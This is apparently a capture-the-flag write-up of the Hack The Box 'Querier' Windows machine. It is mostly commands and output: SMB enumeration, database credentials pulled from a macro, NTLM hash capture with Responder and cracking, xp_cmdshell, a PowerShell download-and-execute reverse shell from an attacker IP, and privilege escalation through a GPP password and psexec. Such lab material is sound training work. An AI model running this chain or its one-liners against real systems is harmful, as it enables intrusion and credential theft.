Querier
Enummeration
Starting of with a portscan.
root@redteam:~/htb/querier# nmap -n -T4 -sV -sC -oN defaultscan 10.10.10.125
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-22 21:40 CEST
Host is up (0.022s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 14.00.1000.00
| ms-sql-ntlm-info:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: QUERIER
| DNS_Domain_Name: HTB.LOCAL
| DNS_Computer_Name: QUERIER.HTB.LOCAL
| DNS_Tree_Name: HTB.LOCAL
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-06-17T04:16:07
| Not valid after: 2049-06-17T04:16:07
| MD5: 408c 1f69 ce32 03b4 6243 3836 e9b8 67ce
|_SHA-1: dff4 ce7d 4050 80b9 422b 66b4 ef66 1972 9a4b 2fe2
|_ssl-date: 2019-06-22T18:25:56+00:00; -1h14m27s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1h14m27s, deviation: 0s, median: -1h14m27s
| ms-sql-info:
| 10.10.10.125:1433:
| Version:
| name: Microsoft SQL Server
| number: 14.00.1000.00
| Product: Microsoft SQL Server
|_ TCP port: 1433
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-06-22 20:26:00
|_ start_date: N/A
NSE: Script Post-scanning.
Initiating NSE at 21:40
Completed NSE at 21:40, 0.00s elapsed
Initiating NSE at 21:40
Completed NSE at 21:40, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.62 seconds
Raw packets sent: 1004 (44.152KB) | Rcvd: 1001 (40.056KB)
No webserver and some services which you need credentials for to make a connection.
SMB
root@redteam:~/htb/querier# smbmap -H 10.10.10.125 -u "guest" [+] Finding open SMB ports.... [+] User SMB session establishd on 10.10.10.125... [+] IP: 10.10.10.125:445 Name: 10.10.10.125 Disk Permissions ---- ----------- ADMIN$ NO ACCESS C$ NO ACCESS IPC$ READ ONLY Reports READ ONLY
The share Reports is not default.
root@redteam:~/htb/querier# smbclient //10.10.10.125/Reports -N Try "help" to get a list of possible commands. smb: \> ls . D 0 Tue Jan 29 00:23:48 2019 .. D 0 Tue Jan 29 00:23:48 2019 Currency Volume Report.xlsm A 12229 Sun Jan 27 23:21:34 2019
Looks like just one Excel file.
smb: \> get "Currency Volume Report.xlsm" getting file \Currency Volume Report.xlsm of size 12229 as Currency Volume Report.xlsm (86.5 KiloBytes/sec) (average 86.5 KiloBytes/sec)
EXCEL
To check a OLE file on Kali there are several tools. This site has a nice overview.
root@redteam:~/htb/querier# olevba 'Currency Volume Report.xlsm'
olevba 0.51 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OpX:M-S-H--- Currency Volume Report.xlsm
===============================================================================
FILE: Currency Volume Report.xlsm
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: xl/vbaProject.bin - OLE stream: u'VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' macro to pull data for client volume reports
'
' further testing required
Private Sub Connect()
Dim conn As ADODB.Connection
Dim rs As ADODB.Recordset
Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
conn.ConnectionTimeout = 10
conn.Open
If conn.State = adStateOpen Then
' MsgBox "connection successful"
'Set rs = conn.Execute("SELECT * @@version;")
Set rs = conn.Execute("SELECT * FROM volume;")
Sheets(1).Range("A1").CopyFromRecordset rs
rs.Close
End If
End Sub
-------------------------------------------------------------------------------
VBA MACRO Sheet1.cls
in file: xl/vbaProject.bin - OLE stream: u'VBA/Sheet1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
+------------+-------------+-----------------------------------------+
| Type | Keyword | Description |
+------------+-------------+-----------------------------------------+
| Suspicious | Open | May open a file |
| Suspicious | Hex Strings | Hex-encoded strings were detected, may |
| | | be used to obfuscate strings (option |
| | | --decode to see all) |
+------------+-------------+-----------------------------------------+
It looks like the macro is recorded to make a connection with the SQL server, database Volume and there is also some credentials which it uses.
MSSQL
For a connection with the MSSQL server Impacket has a python script which can help.
root@redteam:~/htb/querier# mssqlclient.py reporting@10.10.10.125 -windows-auth Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation Password: [*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: volume [*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(QUERIER): Line 1: Changed database context to 'volume'. [*] INFO(QUERIER): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (140 3232) [!] Press help for extra shell commands SQL>
SQL> enable_xp_cmdshell [-] ERROR(QUERIER): Line 105: User does not have permission to perform this action. [-] ERROR(QUERIER): Line 1: You do not have permission to run the RECONFIGURE statement. [-] ERROR(QUERIER): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option. [-] ERROR(QUERIER): Line 1: You do not have permission to run the RECONFIGURE statement.
This user has no permission to perform this action. After browsing the internet I found a page with some nice information.
First starting up Responder.
root@redteam:~/htb/querier# responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 2.3.3.9
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CRTL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Fingerprint hosts [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.8]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Listening for events...
Then use the command xp_deltree to connect to my IP.
SQL> xp_dirtree "\\10.10.14.8\test" subdirectory depth --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- -----------
And capture the hash with Responder.
[SMBv2] NTLMv2-SSP Client : 10.10.10.125 [SMBv2] NTLMv2-SSP Username : QUERIER\mssql-svc [SMBv2] NTLMv2-SSP Hash : mssql-svc::QUERIER:adc9568c4b8fb9d4:D580EC639E550755311B0DA5528DA48D:0101000000000000C0653150DE09D201110D34E634CC0298000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D20106000400020000000800300030000000000000000000000000300000FEC94F05C7300E09E90D318168A2191C7763D53628DD63CA3EFA731E7AC45A780A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E003800000000000000000000000000
CRACKING THE HASH
Because I run my Kali in a VM I use John instead of Hashcat.
root@redteam:~/htb/querier/hash# john --wordlist=/usr/share/wordlists/rockyou.txt --format=netntlmv2 hash Using default input encoding: UTF-8 Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64]) Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status corporate568 (mssql-svc) 1g 0:00:00:11 DONE (2019-06-22 22:46) 0.08960g/s 802775p/s 802775c/s 802775C/s correforenz..corococo Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably Session completed
There is the password.
root@redteam:~/htb/querier# mssqlclient.py mssql-svc@10.10.10.125 -windows-auth Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation Password: [*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(QUERIER): Line 1: Changed database context to 'master'. [*] INFO(QUERIER): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (140 3232) [!] Press help for extra shell commands SQL>
Last user didn’t had permission. Let’s see if it different with this user.
SQL> enable_xp_cmdshell [*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install. [*] INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install. SQL>
Looks like I can run commands with this user.
SQL> xp_cmdshell whoami output -------------------------------------------------------------------------------- querier\mssql-svc NULL
Getting some system information.
SQL> xp_cmdshell systeminfo
output
--------------------------------------------------------------------------------
NULL
Host Name: QUERIER
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-00521-62775-AA073
Original Install Date: 1/28/2019, 11:16:50 PM
System Boot Time: 6/17/2019, 5:15:18 AM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: VMware, Inc. VMW71.00V.7581552.B64.1801142334, 1/14/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 2,047 MB
Available Physical Memory: 812 MB
Virtual Memory: Max Size: 3,199 MB
Virtual Memory: Available: 1,879 MB
Virtual Memory: In Use: 1,320 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB.LOCAL
Logon Server: N/A
Hotfix(s): 6 Hotfix(s) Installed.
[01]: KB4481031
[02]: KB4462930
[03]: KB4470788
[04]: KB4480056
[05]: KB4480979
[06]: KB4476976
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.125
[02]: fe80::ed0c:14f9:fdc3:63ca
[03]: dead:beef::ed0c:14f9:fdc3:63ca
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
NULL
REVERSE SHELL
Time to get a reverse shell, which will give more freedom on this box. For this Kali has a folder with handy file called /usr/share/nishang. From this folder I copy a ps1 file to my working folder.
root@redteam:~/htb/querier/shell# cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 shell.ps1
Then add a line to the bottom of the file: Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.8 -Port 9999
Now to get this file to the remote system. On my local machine I start a python server on port 80.
root@redteam:~/htb/querier/shell# python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ...
On this site there is a command to download and execute the file.
SQL> xp_cmdshell powershell iex(New-Object System.Net.WebClient).DownloadString(\"http://10.10.14.8/shell.ps1\")
root@redteam:~/htb/querier/shell# nc -lvnp 9999 listening on [any] 9999 ... connect to [10.10.14.8] from (UNKNOWN) [10.10.10.125] 49702 Windows PowerShell running as user mssql-svc on QUERIER Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\Windows\system32>
PRIVILEGE ESCALATION
On the Desktop of this user is the first flag.
PS C:\users\mssql-svc\desktop> dir
Directory: C:\users\mssql-svc\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/28/2019 12:08 AM 33 user.txt
On this github page there are some excellent PowerShell scripts. One of them is PowerUp.ps1, which is like LinEnum.sh for Linux.
PS C:\users\mssql-svc\desktop> IEX(New-Object System.NEt.WebClient).DownloadString("http://10.10.14.8/PowerUp.ps1")
PS C:\users\mssql-svc\desktop> Invoke-AllChecks
The script finds several things and one of them is a password in plaintext.
[*] Checking for cached Group Policy Preferences .xml files....
Changed : {2019-01-28 23:12:48}
UserNames : {Administrator}
NewName : [BLANK]
Passwords : {[SPOILER]}
File : C:\ProgramData\Microsoft\Group
Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
root@redteam:~/htb/querier/shell# smbmap -u administrator -p 'MyUnclesAreMarioAndLuigi!!1!' -H 10.10.10.125 -d QUERIER [+] Finding open SMB ports.... [+] User SMB session establishd on 10.10.10.125... [+] IP: 10.10.10.125:445 Name: 10.10.10.125 Disk Permissions ---- ----------- ADMIN$ READ, WRITE C$ READ, WRITE IPC$ READ ONLY Reports READ ONLY
With this account I have read and write permission.
root@redteam:~/htb/querier/shell# psexec.py administrator@10.10.10.125 Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation Password: [*] Requesting shares on 10.10.10.125..... [*] Found writable share ADMIN$ [*] Uploading file hrRThQSF.exe [*] Opening SVCManager on 10.10.10.125..... [*] Creating service tszF on 10.10.10.125..... [*] Starting service tszF..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.292] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system
Now for the final flag.
c:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is FE98-F373
Directory of c:\Users\Administrator\Desktop
01/29/2019 01:04 AM <DIR> .
01/29/2019 01:04 AM <DIR> ..
01/28/2019 01:08 AM 33 root.txt
1 File(s) 33 bytes
2 Dir(s) 6,171,058,176 bytes free
And there we have it. A really nice box with some challenges. And finally a Windows machine for a change.